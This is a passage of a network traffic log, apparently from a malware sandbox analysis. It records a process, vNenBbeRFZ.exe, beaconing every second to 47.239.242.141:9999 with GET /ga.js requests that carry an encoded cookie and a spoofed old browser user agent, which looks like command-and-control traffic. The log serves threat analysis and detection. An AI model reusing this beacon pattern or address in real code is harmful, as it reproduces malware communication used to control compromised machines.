Oct 8, 2024 04:19:30.096118927 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:31.005108118 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	57250	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:31.112009048 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:32.006633043 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	57251	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:32.144459963 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:33.047207117 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	57252	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:33.159580946 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:34.088340998 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	57253	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:34.205888987 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:35.109730959 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	57254	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:35.222645998 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:36.140678883 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	57255	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:36.252635956 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:37.156517029 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	57256	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:37.284548044 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:38.202826977 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	57257	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:38.319267988 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:39.232949972 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	57258	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:39.346759081 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:40.274807930 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	57259	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:40.395332098 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:41.305258989 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	57260	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:41.424583912 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:42.327342987 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	57261	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:42.455738068 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:43.399584055 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	57262	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:43.518434048 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:44.409564972 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	57263	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:44.518429995 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:45.456677914 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	57264	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:45.565092087 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:46.457436085 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	57265	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:46.565603971 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:47.476684093 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	54000	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:47.596470118 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:48.500065088 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	54001	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:48.612185001 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:49.531492949 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	54002	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:49.682339907 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:50.589086056 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	54003	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:50.705895901 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:51.620675087 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	54004	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:51.737292051 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:52.660442114 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	54005	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:52.783988953 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:53.691529989 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	54006	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:53.800003052 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:54.732208967 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	54007	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:54.946335077 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:55.886111021 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	54008	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:56.002990961 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:56.917774916 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	54009	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:57.034018040 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:57.940593958 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	54011	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:58.050271988 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:58.942904949 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	54012	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:59.049556017 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
